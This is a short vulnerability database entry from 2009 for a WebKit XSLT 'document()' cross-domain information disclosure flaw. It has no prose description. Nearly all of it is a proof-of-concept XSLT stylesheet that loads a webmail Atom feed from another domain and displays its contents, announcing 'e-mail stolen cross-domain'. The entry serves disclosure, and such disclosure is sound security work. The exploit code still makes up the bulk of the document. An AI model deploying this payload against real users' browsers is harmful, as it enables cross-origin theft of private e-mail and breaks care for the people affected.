WebKit 'Document()' Function Remote Information Disclosure Vulnerability

2009-11-12T00:00:00
ID SSV:14333
Type seebug
Reporter Root
Modified 2009-11-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.example.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>